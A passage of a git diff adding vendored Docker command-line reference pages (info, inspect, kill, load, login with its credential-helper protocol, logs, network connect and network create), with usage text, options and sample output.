| Attach to a running container | +| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT | +| [create](create.md) | Create a new container | +| [diff](diff.md) | Inspect changes on a container's filesystem | +| [events](events.md) | Get real time events from the server | +| [exec](exec.md) | Run a command in a running container | +| [export](export.md) | Export a container's filesystem as a tar archive | +| [kill](kill.md) | Kill a running container | +| [logs](logs.md) | Fetch the logs of a container | +| [pause](pause.md) | Pause all processes within a container | +| [port](port.md) | List port mappings or a specific mapping for the container | +| [ps](ps.md) | List containers | +| [rename](rename.md) | Rename a container | +| [restart](restart.md) | Restart a running container | +| [rm](rm.md) | Remove one or more containers | +| [run](run.md) | Run a command in a new container | +| [start](start.md) | Start one or more stopped containers | +| [stats](stats.md) | Display a live stream of container(s) resource usage statistics | +| [stop](stop.md) | Stop a running container | +| [top](top.md) | Display the running processes of a container | +| [unpause](unpause.md) | Unpause all processes within a container | +| [update](update.md) | Update configuration of one or more containers | +| [wait](wait.md) | Block until a container stops, then print its exit code | + +### Hub and registry commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [login](login.md) | Register or log in to a Docker registry | +| [logout](logout.md) | Log out from a Docker registry | +| [pull](pull.md) | Pull an image or a repository from a Docker registry | +| [push](push.md) | Push an image or a repository to a Docker registry | +| [search](search.md) | Search the Docker Hub for images | + +### Network and connectivity commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [network connect](network_connect.md) | Connect a container to a network | +| [network create](network_create.md) | Create a new network | +| [network disconnect](network_disconnect.md) | Disconnect a container from a network | +| [network inspect](network_inspect.md) | Display information about a network | +| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about | +| [network rm](network_rm.md) | Removes one or more networks | + + +### Shared data volume commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data | +| [volume inspect](volume_inspect.md) | Display information about a volume | +| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about | +| [volume prune](volume_prune.md) | Remove all unused volumes | +| [volume rm](volume_rm.md) | Remove one or more volumes | + + +### Swarm node commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager | +| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager | +| [node inspect](node_inspect.md) | Inspect a node in the swarm | +| [node update](node_update.md) | Update attributes for a node | +| [node ps](node_ps.md) | List tasks running on one or more nodes | +| [node ls](node_ls.md) | List nodes in the swarm | +| [node rm](node_rm.md) | Remove one or more nodes from the swarm | + +### Swarm swarm commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [swarm init](swarm_init.md) | Initialize a swarm | +| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node | +| [swarm leave](swarm_leave.md) | Remove the current node from the swarm | +| [swarm update](swarm_update.md) | Update attributes of a swarm | +| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens | + +### Swarm service commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [service create](service_create.md) | Create a new service | +| [service inspect](service_inspect.md) | Inspect a service | +| [service ls](service_ls.md) | List services in the swarm | +| [service rm](service_rm.md) | Remove a service from the swarm | +| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service | +| [service ps](service_ps.md) | List the tasks of a service | +| [service update](service_update.md) | Update the attributes of a service | + +### Swarm secret commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [secret create](secret_create.md) | Create a secret from a file or STDIN as content | +| [secret inspect](service_inspect.md) | Inspect the specified secret | +| [secret ls](secret_ls.md) | List secrets in the swarm | +| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm | + +### Swarm stack commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack | +| [stack ls](stack_ls.md) | List stacks in the swarm | +| [stack ps](stack_ps.md) | List the tasks in the stack | +| [stack rm](stack_rm.md) | Remove the stack from the swarm | +| [stack services](stack_services.md) | List the services in the stack | + +### Plugin commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration | +| [plugin disable](plugin_disable.md) | Disable a plugin | +| [plugin enbale](plugin_enable.md) | Enable a plugin | +| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin | +| [plugin install](plugin_install.md) | Install a plugin | +| [plugin ls](plugin_ls.md) | List plugins | +| [plugin push](plugin_push.md) | Push a plugin to a registry | +| [plugin rm](plugin_rm.md) | Remove a plugin | +| [plugin set](plugin_set.md) | Change settings for a plugin | diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md new file mode 100644 index 0000000000..50a084fcb2 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/info.md @@ -0,0 +1,224 @@ +--- +title: "info" +description: "The info command description and usage" +keywords: "display, docker, information" +--- + + + +# info + +```markdown +Usage: docker info [OPTIONS] + +Display system-wide information + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +This command displays system wide information regarding the Docker installation. +Information displayed includes the kernel version, number of containers and images. +The number of images shown is the number of unique images. The same image tagged +under different names is counted only once. + +If a format is specified, the given template will be executed instead of the +default format. Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +Depending on the storage driver in use, additional information can be shown, such +as pool name, data file, metadata file, data space used, total data space, metadata +space used, and total metadata space. + +The data file is where the images are stored and the metadata file is where the +meta data regarding those images are stored. When run for the first time Docker +allocates a certain amount of data space and meta data space from the space +available on the volume where `/var/lib/docker` is mounted. + +# Examples + +## Display Docker system information + +Here is a sample output for a daemon running on Ubuntu, using the overlay2 +storage driver and a node that is part of a 2-node swarm: + + $ docker -D info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.13.0 + Storage Driver: overlay2 + Backing Filesystem: extfs + Supports d_type: true + Native Overlay Diff: false + Logging Driver: json-file + Cgroup Driver: cgroupfs + Plugins: + Volume: local + Network: bridge host macvlan null overlay + Swarm: active + NodeID: rdjq45w1op418waxlairloqbm + Is Manager: true + ClusterID: te8kdyw33n36fqiz74bfjeixd + Managers: 1 + Nodes: 2 + Orchestration: + Task History Retention Limit: 5 + Raft: + Snapshot Interval: 10000 + Number of Old Snapshots to Retain: 0 + Heartbeat Tick: 1 + Election Tick: 3 + Dispatcher: + Heartbeat Period: 5 seconds + CA Configuration: + Expiry Duration: 3 months + Node Address: 172.16.66.128 172.16.66.129 + Manager Addresses: + 172.16.66.128:2477 + Runtimes: runc + Default Runtime: runc + Init Binary: docker-init + containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 + runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 + init version: N/A (expected: v0.13.0) + Security Options: + apparmor + seccomp + Profile: default + Kernel Version: 4.4.0-31-generic + Operating System: Ubuntu 16.04.1 LTS + OSType: linux + Architecture: x86_64 + CPUs: 2 + Total Memory: 1.937 GiB + Name: ubuntu + ID: H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 + Docker Root Dir: /var/lib/docker + Debug Mode (client): true + Debug Mode (server): true + File Descriptors: 30 + Goroutines: 123 + System Time: 2016-11-12T17:24:37.955404361-08:00 + EventsListeners: 0 + Http Proxy: http://test:test@proxy.example.com:8080 + Https Proxy: https://test:test@proxy.example.com:8080 + No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com + Registry: https://index.docker.io/v1/ + WARNING: No swap limit support + Labels: + storage=ssd + staging=true + Experimental: false + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false + +The global `-D` option tells all `docker` commands to output debug information. + +The example below shows the output for a daemon running on Red Hat Enterprise Linux, +using the devicemapper storage driver. As can be seen in the output, additional +information about the devicemapper storage driver is shown: + + $ docker info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.10.3 + Storage Driver: devicemapper + Pool Name: docker-202:2-25583803-pool + Pool Blocksize: 65.54 kB + Base Device Size: 10.74 GB + Backing Filesystem: xfs + Data file: /dev/loop0 + Metadata file: /dev/loop1 + Data Space Used: 1.68 GB + Data Space Total: 107.4 GB + Data Space Available: 7.548 GB + Metadata Space Used: 2.322 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.145 GB + Udev Sync Supported: true + Deferred Removal Enabled: false + Deferred Deletion Enabled: false + Deferred Deleted Device Count: 0 + Data loop file: /var/lib/docker/devicemapper/devicemapper/data + Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.107-RHEL7 (2015-12-01) + Execution Driver: native-0.2 + Logging Driver: json-file + Plugins: + Volume: local + Network: null host bridge + Kernel Version: 3.10.0-327.el7.x86_64 + Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) + OSType: linux + Architecture: x86_64 + CPUs: 1 + Total Memory: 991.7 MiB + Name: ip-172-30-0-91.ec2.internal + ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S + Docker Root Dir: /var/lib/docker + Debug mode (client): false + Debug mode (server): false + Username: gordontheturtle + Registry: https://index.docker.io/v1/ + Insecure registries: + myinsecurehost:5000 + 127.0.0.0/8 + +You can also specify the output format: + + $ docker info --format '{{json .}}' + {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} + +Here is a sample output for a daemon running on Windows Server 2016: + + E:\docker>docker info + Containers: 1 + Running: 0 + Paused: 0 + Stopped: 1 + Images: 17 + Server Version: 1.13.0 + Storage Driver: windowsfilter + Windows: + Logging Driver: json-file + Plugins: + Volume: local + Network: nat null overlay + Swarm: inactive + Default Isolation: process + Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937) + Operating System: Windows Server 2016 Datacenter + OSType: windows + Architecture: x86_64 + CPUs: 8 + Total Memory: 3.999 GiB + Name: WIN-V0V70C0LU5P + ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62 + Docker Root Dir: C:\control + Debug Mode (client): false + Debug Mode (server): false + Registry: https://index.docker.io/v1/ + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md new file mode 100644 index 0000000000..7a0c3a0871 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md @@ -0,0 +1,102 @@ +--- +title: "inspect" +description: "The inspect command description and usage" +keywords: "inspect, container, json" +--- + + + +# inspect + +```markdown +Usage: docker inspect [OPTIONS] NAME|ID [NAME|ID...] + +Return low-level information on Docker object(s) (e.g. container, image, volume, +network, node, service, or task) identified by name or ID + +Options: + -f, --format Format the output using the given Go template + --help Print usage + -s, --size Display total file sizes if the type is container + --type Return JSON for specified type +``` + +By default, this will render all results in a JSON array. If the container and +image have the same name, this will return container JSON for unspecified type. +If a format is specified, the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +**Get an instance's IP address:** + +For the most part, you can pick out any field from the JSON in a fairly +straightforward manner. + + {% raw %} + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID + {% endraw %} + +**Get an instance's MAC address:** + +For the most part, you can pick out any field from the JSON in a fairly +straightforward manner. + + {% raw %} + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID + {% endraw %} + +**Get an instance's log path:** + + {% raw %} + $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID + {% endraw %} + +**Get a Task's image name:** + + {% raw %} + $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID + {% endraw %} + +**List all port bindings:** + +One can loop over arrays and maps in the results to produce simple text +output: + + {% raw %} + $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID + {% endraw %} + +**Find a specific port mapping:** + +The `.Field` syntax doesn't work when the field name begins with a +number, but the template language's `index` function does. The +`.NetworkSettings.Ports` section contains a map of the internal port +mappings to a list of external address/port objects. To grab just the +numeric public port, you use `index` to find the specific port map, and +then `index` 0 contains the first object inside of that. Then we ask for +the `HostPort` field to get the public address. + + {% raw %} + $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID + {% endraw %} + +**Get a subsection in JSON format:** + +If you request a field which is itself a structure containing other +fields, by default you get a Go-style dump of the inner values. +Docker adds a template function, `json`, which can be applied to get +results in JSON format. + + {% raw %} + $ docker inspect --format='{{json .Config}}' $INSTANCE_ID + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/kill.md b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md new file mode 100644 index 0000000000..32fde3d8b5 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/kill.md @@ -0,0 +1,34 @@ +--- +title: "kill" +description: "The kill command description and usage" +keywords: "container, kill, signal" +--- + + + +# kill + +```markdown +Usage: docker kill [OPTIONS] CONTAINER [CONTAINER...] + +Kill one or more running containers + +Options: + --help Print usage + -s, --signal string Signal to send to the container (default "KILL") +``` + +The main process inside the container will be sent `SIGKILL`, or any +signal specified with option `--signal`. + +> **Note:** +> `ENTRYPOINT` and `CMD` in the *shell* form run as a subcommand of `/bin/sh -c`, +> which does not pass signals. This means that the executable is not the container’s PID 1 +> and does not receive Unix signals. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/load.md b/vendor/github.com/docker/docker/docs/reference/commandline/load.md new file mode 100644 index 0000000000..04a5bc7e56 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/load.md @@ -0,0 +1,53 @@ +--- +title: "load" +description: "The load command description and usage" +keywords: "stdin, tarred, repository" +--- + + + +# load + +```markdown +Usage: docker load [OPTIONS] + +Load an image from a tar archive or STDIN + +Options: + --help Print usage + -i, --input string Read from tar archive file, instead of STDIN. + The tarball may be compressed with gzip, bzip, or xz + -q, --quiet Suppress the load output but still outputs the imported images +``` + +Loads a tarred repository from a file or the standard input stream. +Restores both images and tags. + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + $ docker load < busybox.tar.gz + # […] + Loaded image: busybox:latest + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + $ docker load --input fedora.tar + # […] + Loaded image: fedora:rawhide + # […] + Loaded image: fedora:20 + # […] + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest 769b9341d937 7 weeks ago 2.489 MB + fedora rawhide 0d20aec6529d 7 weeks ago 387 MB + fedora 20 58394af37342 7 weeks ago 385.5 MB + fedora heisenbug 58394af37342 7 weeks ago 385.5 MB + fedora latest 58394af37342 7 weeks ago 385.5 MB diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md new file mode 100644 index 0000000000..a0f35fd4d0 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/login.md @@ -0,0 +1,122 @@ +--- +title: "login" +description: "The login command description and usage" +keywords: "registry, login, image" +--- + + + +# login + +```markdown +Usage: docker login [OPTIONS] [SERVER] + +Log in to a Docker registry. +If no server is specified, the default is defined by the daemon. + +Options: + --help Print usage + -p, --password string Password + -u, --username string Username +``` + +If you want to login to a self-hosted registry you can specify this by +adding the server name. + + example: + $ docker login localhost:8080 + + +`docker login` requires user to use `sudo` or be `root`, except when: + +1. connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`. +2. user is added to the `docker` group. This will impact the security of your system; the `docker` group is `root` equivalent. See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details. + +You can log into any public or private repository for which you have +credentials. When you log in, the command stores encoded credentials in +`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows. + +## Credentials store + +The Docker Engine can keep user credentials in an external credentials store, +such as the native keychain of the operating system. Using an external store +is more secure than storing credentials in the Docker configuration file. + +To use a credentials store, you need an external helper program to interact +with a specific keychain or external store. Docker requires the helper +program to be in the client's host `$PATH`. + +This is the list of currently available credentials helpers and where +you can download them from: + +- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases +- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases +- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases + +### Usage + +You need to specify the credentials store in `$HOME/.docker/config.json` +to tell the docker engine to use it: + +```json +{ + "credsStore": "osxkeychain" +} +``` + +If you are currently logged in, run `docker logout` to remove +the credentials from the file and run `docker login` again. + +### Protocol + +Credential helpers can be any program or script that follows a very simple protocol. +This protocol is heavily inspired by Git, but it differs in the information shared. + +The helpers always use the first argument in the command to identify the action. +There are only three possible values for that argument: `store`, `get`, and `erase`. + +The `store` command takes a JSON payload from the standard input. That payload carries +the server address, to identify the credential, the user name, and either a password +or an identity token. + +```json +{ + "ServerURL": "https://index.docker.io/v1", + "Username": "david", + "Secret": "passw0rd1" +} +``` + +If the secret being stored is an identity token, the Username should be set to +``. + +The `store` command can write error messages to `STDOUT` that the docker engine +will show if there was an issue. + +The `get` command takes a string payload from the standard input. That payload carries +the server address that the docker engine needs credentials for. This is +an example of that payload: `https://index.docker.io/v1`. + +The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name +and password from this payload: + +```json +{ + "Username": "david", + "Secret": "passw0rd1" +} +``` + +The `erase` command takes a string payload from `STDIN`. That payload carries +the server address that the docker engine wants to remove credentials for. This is +an example of that payload: `https://index.docker.io/v1`. + +The `erase` command can write error messages to `STDOUT` that the docker engine +will show if there was an issue. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md new file mode 100644 index 0000000000..1635e2244b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md @@ -0,0 +1,30 @@ +--- +title: "logout" +description: "The logout command description and usage" +keywords: "logout, docker, registry" +--- + + + +# logout + +```markdown +Usage: docker logout [SERVER] + +Log out from a Docker registry. +If no server is specified, the default is defined by the daemon. + +Options: + --help Print usage +``` + +For example: + + $ docker logout localhost:8080 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md new file mode 100644 index 0000000000..891e10b55c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md @@ -0,0 +1,66 @@ +--- +title: "logs" +description: "The logs command description and usage" +keywords: "logs, retrieve, docker" +--- + + + +# logs + +```markdown +Usage: docker logs [OPTIONS] CONTAINER + +Fetch the logs of a container + +Options: + --details Show extra details provided to logs + -f, --follow Follow log output + --help Print usage + --since string Show logs since timestamp + --tail string Number of lines to show from the end of the logs (default "all") + -t, --timestamps Show timestamps +``` + +The `docker logs` command batch-retrieves logs present at the time of execution. + +> **Note**: this command is only functional for containers that are started with +> the `json-file` or `journald` logging driver. + +For more information about selecting and configuring logging drivers, refer to +[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). + +The `docker logs --follow` command will continue streaming the new output from +the container's `STDOUT` and `STDERR`. + +Passing a negative number or a non-integer to `--tail` is invalid and the +value is set to `all` in that case. + +The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) +, for example `2014-09-16T06:17:46.000000000Z`, to each +log entry. To ensure that the timestamps are aligned the +nano-second part of the timestamp will be padded with zero when necessary. + +The `docker logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +container. + +The `--since` option shows only the container logs generated after +a given date. You can specify the date as an RFC 3339 date, a UNIX +timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date +format you may also use RFC3339Nano, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. You can combine the +`--since` option with either or both of the `--follow` or `--tail` options. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md new file mode 100644 index 0000000000..d58afacd76 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md @@ -0,0 +1,28 @@ +--- +title: "Command line reference" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +identifier: "smn_cli" +--- + + + +# The Docker commands + +This section contains reference information on using Docker's command line +client. Each command has a reference page along with samples. If you are +unfamiliar with the command line, you should start by reading about how to +[Use the Docker command line](cli.md). + +You start the Docker daemon with the command line. How you start the daemon +affects your Docker containers. For that reason you should also make sure to +read the [`dockerd`](dockerd.md) reference page. + +For a list of Docker commands see [Command line reference guide](index.md). diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md new file mode 100644 index 0000000000..52459a5d5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md @@ -0,0 +1,100 @@ +--- +title: "network connect" +description: "The network connect command description and usage" +keywords: "network, connect, user-defined" +--- + + + +# network connect + +```markdown +Usage: docker network connect [OPTIONS] NETWORK CONTAINER + +Connect a container to a network + +Options: + --alias value Add network-scoped alias for the container (default []) + --help Print usage + --ip string IP Address + --ip6 string IPv6 Address + --link value Add link to another container (default []) + --link-local-ip value Add a link-local address for the container (default []) +``` + +Connects a container to a network. You can connect a container by name +or by ID. Once connected, the container can communicate with other containers in +the same network. + +```bash +$ docker network connect multi-host-network container1 +``` + +You can also use the `docker run --network=` option to start a container and immediately connect it to a network. + +```bash +$ docker run -itd --network=multi-host-network busybox +``` + +You can specify the IP address you want to be assigned to the container's interface. + +```bash +$ docker network connect --ip 10.10.36.122 multi-host-network container2 +``` + +You can use `--link` option to link another container with a preferred alias + +```bash +$ docker network connect --link container1:c1 multi-host-network container2 +``` + +`--alias` option can be used to resolve the container by another name in the network +being connected to. + +```bash +$ docker network connect --alias db --alias mysql multi-host-network container2 +``` +You can pause, restart, and stop containers that are connected to a network. +A container connects to its configured networks when it runs. + +If specified, the container's IP address(es) is reapplied when a stopped +container is restarted. If the IP address is no longer available, the container +fails to start. One way to guarantee that the IP address is available is +to specify an `--ip-range` when creating the network, and choose the static IP +address(es) from outside that range. This ensures that the IP address is not +given to another container while this container is not on the network. + +```bash +$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network +``` + +```bash +$ docker network connect --ip 172.20.128.2 multi-host-network container2 +``` + +To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network. + +Once connected in network, containers can communicate using only another +container's IP address or name. For `overlay` networks or custom plugins that +support multi-host connectivity, containers connected to the same multi-host +network but launched from different Engines can also communicate in this way. + +You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks. + +## Related information + +* [network inspect](network_inspect.md) +* [network create](network_create.md) +* [network disconnect](network_disconnect.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) +* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md new file mode 100644 index 0000000000..e238217d41 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md @@ -0,0 +1,202 @@ +--- +title: "network create" +description: "The network create command description and usage" +keywords: "network, create" +--- + + + +# network create + +```markdown +Usage: docker network create [OPTIONS] NETWORK + +Create a network + +Options: + --attachable Enable manual container attachment + --aux-address value Auxiliary IPv4 or IPv6 addresses used by Network + driver (default map[]) + -d, --driver string Driver to manage the Network (default "bridge") + --gateway value IPv4 or IPv6 Gateway for the master subnet (default []) + --help Print usage + --internal Restrict external access to the network + --ip-range value Allocate container ip from a sub-range (default []) + --ipam-driver string IP Address Management Driver (default "default") + --ipam-opt value Set IPAM driver specific options (default map[]) + --ipv6 Enable IPv6 networking + --label value Set metadata on a network (default []) + -o, --opt value Set driver specific options (default map[]) + --subnet value Subnet in CIDR format that represents a + network segment (default []) +``` + +Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the +built-in network drivers. If you have installed a third party or your own custom +network driver you can specify that `DRIVER` here also. If you don't specify the +`--driver` option, the command automatically creates a `bridge` network for you. +When you install Docker Engine it creates a `bridge` network automatically. This +network corresponds to the `docker0` bridge that Engine has traditionally relied +on. When you launch a new container with `docker run` it automatically connects to +this bridge network. You cannot remove this default bridge network, but you can +create new ones using the `network create` command. + +```bash +$ docker network create -d bridge my-bridge-network +``` + +Bridge networks are isolated networks on a single Engine installation. If you +want to create a network that spans multiple Docker hosts each running an +Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay +networks require some pre-existing conditions before you can create one. These +conditions are: + +* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores. +* A cluster of hosts with connectivity to the key-value store. +* A properly configured Engine `daemon` on each host in the cluster. + +The `dockerd` options that support the `overlay` network are: + +* `--cluster-store` +* `--cluster-store-opt` +* `--cluster-advertise` + +To read more about these options and how to configure them, see ["*Get started +with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay). + +While not required, it is a good idea to install Docker Swarm to +manage the cluster that makes up your network. Swarm provides sophisticated +discovery and server management tools that can assist your implementation. + +Once you have prepared the `overlay` network prerequisites you simply choose a +Docker host in the cluster and issue the following to create the network: + +```bash +$ docker network create -d overlay my-multihost-network +``` + +Network names must be unique. The Docker daemon attempts to identify naming +conflicts but this is not guaranteed. It is the user's responsibility to avoid +name conflicts. + +## Connect containers + +When you start a container, use the `--network` flag to connect it to a network. +This example adds the `busybox` container to the `mynet` network: + +```bash +$ docker run -itd --network=mynet busybox +``` + +If you want to add a container to a network after the container is already +running, use the `docker network connect` subcommand. + +You can connect multiple containers to the same network. Once connected, the +containers can communicate using only another container's IP address or name. +For `overlay` networks or custom plugins that support multi-host connectivity, +containers connected to the same multi-host network but launched from different +Engines can also communicate in this way. + +You can disconnect a container from a network using the `docker network +disconnect` command. + +## Specifying advanced options + +When you create a network, Engine creates a non-overlapping subnetwork for the +network by default. This subnetwork is not a subdivision of an existing +network. It is purely for ip-addressing purposes. You can override this default +and specify subnetwork values directly using the `--subnet` option. On a +`bridge` network you can only create a single subnet: + +```bash +$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0 +``` + +Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` +options. + +```bash +$ docker network create \ + --driver=bridge \ + --subnet=172.28.0.0/16 \ + --ip-range=172.28.5.0/24 \ + --gateway=172.28.5.254 \ + br0 +``` + +If you omit the `--gateway` flag the Engine selects one for you from inside a +preferred pool. For `overlay` networks and for network driver plugins that +support it you can create multiple subnetworks. + +```bash +$ docker network create -d overlay \ + --subnet=192.168.0.0/16 \ + --subnet=192.170.0.0/16 \ + --gateway=192.168.0.100 \ + --gateway=192.170.0.100 \ + --ip-range=192.168.1.0/24 \ + --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ + --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ + my-multihost-network +``` + +Be sure that your subnetworks do not overlap. If they do, the network create +fails and Engine returns an error. + +# Bridge driver options + +When creating a custom network, the default network driver (i.e. `bridge`) has +additional options that can be passed. The following are those options and the +equivalent docker daemon flags used for docker0 bridge: + +| Option | Equivalent | Description | +|--------------------------------------------------|-------------|-------------------------------------------------------| +| `com.docker.network.bridge.name` | - | bridge name to be used when creating the Linux bridge | +| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading | +| `com.docker.network.bridge.enable_icc` | `--icc` | Enable or Disable Inter Container Connectivity | +| `com.docker.network.bridge.host_binding_ipv4` | `--ip` | Default IP when binding container ports | +| `com.docker.network.driver.mtu` | `--mtu` | Set the containers network MTU | + +The following arguments can be passed to `docker network create` for any +network driver, again with their approximate equivalents to `docker daemon`. + +| Argument | Equivalent | Description | +|--------------|----------------|--------------------------------------------| +| `--gateway` | - | IPv4 or IPv6 Gateway for the master subnet | +| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range | +| `--internal` | - | Restrict external access to the network | +| `--ipv6` | `--ipv6` | Enable IPv6 networking | +| `--subnet` | `--bip` | Subnet for network | + +For example, let's use `-o` or `--opt` options to specify an IP address binding +when publishing ports: + +```bash +$ docker network create \ + -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \ + simple-network +``` + +### Network internal mode + +By default, when you connect a container to an `overlay` network, Docker also +connects a bridge network to it to provide external connectivity. If you want +to create an externally isolated `overlay` network, you can specify the +`--internal` option. + +## Related information + +* [network inspect](network_inspect.md) +* [network connect](network_connect.md) +* [network 